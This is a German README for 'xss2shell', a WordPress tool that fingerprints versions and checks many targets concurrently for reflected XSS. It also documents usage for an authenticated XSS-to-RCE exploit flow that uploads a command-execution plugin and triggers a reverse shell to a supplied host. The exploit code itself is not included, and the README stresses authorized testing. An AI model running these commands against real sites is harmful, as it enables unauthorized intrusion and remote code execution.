
WordPress-Sicherheitsscanner, der Versionen identifiziert, reflektierte XSS-Schwachstellen gleichzeitig auf mehreren Zielen erkennt und einen authentifizierten XSS-zu-RCE-Exploit-Workflow für autorisierte Tests unterstützt.
Entwickler: Credit: YogaGymn
PoC-/Scanning-Tool für autorisierte Sicherheitstests an WordPress. Das Projekt enthält einen Exploit-Ablauf für Einzelziele und einen nebenläufigen Nur-Scan-Modus für mehrere Ziele.
Wichtig: Verwenden Sie dieses Projekt nur auf WordPress-Installationen, die Ihnen gehören oder für die Sie eine ausdrückliche Testgenehmigung haben. Der Multi-Target-Scanner ist absichtlich auf Versionserkennung und Erkennung von XSS-Reflexion beschränkt; er führt gegen eine Zielliste keine Erfassung von Anmeldedaten, keinen Plugin-Upload und kein RCE durch.
Das ursprüngliche Skript unterstützt:
auto, xss und direct.Der hinzugefügte Scanner unterstützt:
ThreadPoolExecutor.Der Multi-Target-Modus ruft die ursprünglichen RCE-Funktionen nicht auf.
requestsInstallieren Sie die Abhängigkeit:
python3 -m pip install requests
Wenn Ihre Linux-Distribution eine extern verwaltete Python-Umgebung verwendet, nutzen Sie eine virtuelle Umgebung:
python3 -m venv .venv
source .venv/bin/activate
pip install requests
Klonen oder kopieren Sie das Projekt: Original-Exploit von yogaGymn
git clone https://github.com/yogaGymn/XSS2Shell-CVE-2026-64638
cd XSS2Shell-CVE-2026-64638
Oder legen Sie einfach:
xss2shell.py
in Ihrem Arbeitsverzeichnis ab.
Erstellen Sie eine Datei namens targets.txt oder alvos.txt:
https://example1.test
https://example2.test
https://example3.test
Kommentare und leere Zeilen werden ignoriert:
# Alvos de laboratório autorizado
https://example1.test
https://example2.test
Führen Sie den Scanner aus:
python3 xss2shell.py -i targets.txt
Die Standard-Nebenläufigkeit beträgt 10 Worker.
Verwenden Sie beispielsweise 20 Worker:
python3 xss2shell.py -i targets.txt --workers 20
Für ein kleines Labor:
python3 xss2shell.py -i targets.txt --workers 5
Wählen Sie keine unnötig hohe Anzahl von Workern, da dies die Verbindungslast erhöhen und Rate-Limits oder defensive Kontrollen auslösen kann.
python3 xss2shell.py \
-i targets.txt \
--workers 10 \
--output results.txt
[*] Multiple-target scan: 3 target(s)
[*] Concurrent workers: 10
[*] Scan-only: WordPress fingerprint + XSS reflection check
[*] No login, plugin upload, credential capture, or RCE
[1/3] https://example1.test | WP=6.8.2 | XSS=XSS_NOT_DETECTED (ESCAPED)
[2/3] https://example2.test | WP=6.7.1 | XSS=XSS_REFLECTION_DETECTED (AREA_BYPASS)
[3/3] https://example3.test | WP=unknown | XSS=XSS_NOT_DETECTED (NOT_REFLECTED)
=======================================================
MULTIPLE-TARGET SCAN COMPLETE
=======================================================
Total targets : 3
XSS detected : 1
Not detected : 2
Errors : 0
Results saved : scan_results.txt
Die Standarddatei scan_results.txt verwendet tabulatorgetrennte Felder:
TARGET WORDPRESS_VERSION XSS_STATUS XSS_DETAIL
Beispiel:
https://example1.test 6.8.2 XSS_NOT_DETECTED ESCAPED
https://example2.test 6.7.1 XSS_REFLECTION_DETECTED AREA_BYPASS
Status Bedeutung
XSS_REFLECTION_DETECTED Der Scanner hat das getestete
HTML-Reflexionsverhalten erkannt.
Dies ist für sich genommen kein
Beweis für RCE.
XSS_NOT_DETECTED Die getestete Reflexion wurde
nicht erkannt.
ERROR Bei der Prüfung ist eine Ausnahme
aufgetreten.Der Scanner kann folgende Details melden:
RAW_HTMLAREA_BYPASSESCAPEDSTRIPPEDNOT_REFLECTEDDiese Werte beschreiben die von der Erkennungsroutine beobachtete Antwort; sie müssen manuell validiert werden, bevor ein Ergebnis als bestätigte Schwachstelle betrachtet wird.
Das ursprüngliche Skript unterstützt ebenfalls Argumente für ein einzelnes Ziel.
python3 xss2shell.py \
-u admin \
-p 'PASSWORD' \
http://authorized-target.test
python3 xss2shell.py \
--mode direct \
-u admin \
-p 'PASSWORD' \
http://authorized-target.test
python3 xss2shell.py \
--mode xss \
--lhost 192.0.2.10 \
http://authorized-lab.test
Die XSS-/direkten Arbeitsabläufe können ein Plugin erstellen oder aktivieren, das Befehlsausführungsfunktionen enthält. Verwenden Sie sie nur in einer autorisierten Testumgebung.
usage: xss2shell.py [-h]
[-i TARGET_FILE] [--output OUTPUT] [--workers WORKERS]
[--mode {auto,xss,direct}]
[-u USERNAME] [-p PASSWORD]
[--lhost LHOST] [--lport LPORT]
[--slug SLUG] [--callback-port CALLBACK_PORT]
[--no-rev]
[target]
Argument Beschreibung
target URL eines einzelnen Ziels.
-i, --input Datei, die mehrere Ziele enthält.
--output Ausgabedatei für
Multi-Target-Ergebnisse.
Standard: scan_results.txt.
--workers Anzahl gleichzeitiger Worker.
Standard: 10.
--mode Ursprünglicher Einzelziel-Modus:
auto, xss oder direct.
-u, --username WordPress-Benutzername für den
ursprünglichen direkten/
Fallback-Ablauf.
-p, --password WordPress-Passwort für den
ursprünglichen direkten/
Fallback-Ablauf.
--lhost Callback-/Reverse-Shell-Host für
den ursprünglichen PoC.
--lport Reverse-Shell-Port.
Standard: 4444.
--slug Plugin-Slug. Standard:
xss2shell.
--callback-port Callback-Server-Port.
Standard: 9090.
--no-rev Reverse-Shell-Auslösung im
ursprünglichen Ablauf
überspringen.Der Multi-Target-Modus nutzt das folgende Python-Feature:
ThreadPoolExecutor
Jedes Ziel wird als unabhängige Scan-Aufgabe übermittelt:
targets.txt
|
v
+----+----+----+----+
| T1 | T2 | T3 | T4 | ...
+----+----+----+----+
| | | |
v v v v
WP WP WP WP
XSS XSS XSS XSS
| | | |
+----+----+----+
|
v
scan_results.txt
Die Ergebnisse werden gesammelt, sobald die Aufgaben abgeschlossen sind, während die endgültige Ausgabe in der ursprünglichen Reihenfolge der Ziele erzeugt wird.
Der Multi-Target-Modus ist für autorisierte Sicherheitsbewertungen und Laborumgebungen konzipiert.
Empfohlener Arbeitsablauf:
targets.txt auf.Verwenden Sie den Scanner nicht ohne Erlaubnis gegen Systeme Dritter.
Der Scanner ist kein vollständiges Tool zur Schwachstellenbewertung.
Insbesondere:
unknown (unbekannt) bedeutet nicht, dass das Ziel verwundbar ist..
├── xss2shell.py
├── targets.txt
└── scan_results.txt
Im bereitgestellten Quellcode waren keine Lizenzinformationen enthalten.
Wenn dieses Projekt öffentlich veröffentlicht wird, fügen Sie eine explizite Lizenzdatei wie LICENSE hinzu. Dieser Code ist eine Weiterentwicklung des ursprünglichen ZSecurity-Codes.